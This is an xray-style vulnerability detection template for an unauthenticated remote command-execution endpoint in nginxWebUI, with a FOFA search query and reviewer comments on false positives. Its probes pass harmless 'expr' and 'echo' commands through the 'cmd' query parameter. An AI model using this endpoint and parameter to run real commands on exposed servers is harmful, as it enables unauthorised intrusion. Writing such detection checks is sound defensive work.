漏洞描述
FOFA: app="nginxWebUI"
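# xray-style detection template for the unauthenticated command-execution
# endpoint exposed by nginxWebUI at /AdminPage/conf/runCmd.
# The probes only run `expr` and `echo`; both rules match on the JSON
# "运行失败" / "运行成功" status strings plus the echoed value so that a
# generic 200 page cannot produce a false positive.
id: nginxwebui-rce

info:
  name: Nginx Web UI RCE
  author: xpoc
  severity: high
  verified: true
  description: |
    FOFA: app="nginxWebUI"
  tags: nginx,rce
  created: 2023/06/28

# Randomised markers so a reflected/cached response cannot satisfy the rules.
set:
  s1: randomInt(100000000, 200000000)
  s2: randomInt(10000, 20000)
  s3: string("nginx_") + randomLowercase(5)

rules:
  # r0: arithmetic probe — the body must contain the computed difference
  # s1 - s2, which a static error page cannot know in advance.
  r0:
    request:
      method: GET
      path: /AdminPage/conf/runCmd?cmd=expr%20{{s1}}%20-%20{{s2}}%26%26echo%20nginx
    expression: response.status == 200 && response.body.bcontains(bytes(string(s1 - s2))) && response.body.bcontains(b"运行失败") && response.content_type.contains("application/json")
  # r1: echo probe — the random marker s3 must be reflected in a successful
  # JSON result. response.body is bytes, so bcontains is used (the original
  # mixed string .contains with a bytes literal here, unlike r0).
  r1:
    request:
      method: GET
      path: /AdminPage/conf/runCmd?cmd=echo%20{{s3}}
    expression: response.status == 200 && response.body.bcontains(bytes(s3)) && response.body.bcontains(b"运行成功") && response.content_type.contains("application/json")
  # r2: product fingerprint only (page title); it does not prove the
  # endpoint is exposed. NOTE(review): path casing differs from r0/r1
  # (/aDminPage vs /AdminPage) — confirm this is intentional.
  r2:
    request:
      method: GET
      path: /aDminPage/about
    expression: response.status == 200 && response.body.ibcontains(b"<title>nginxWebUI</title>") && response.content_type.contains("text/html")

# NOTE(review): because r2 is only a fingerprint, `|| r2()` reports a match on
# every nginxWebUI instance, patched or not. For a true-positive-only signal,
# evaluate r0() || r1() and keep r2 as a separate fingerprint check.
expression: r0() || r1() || r2()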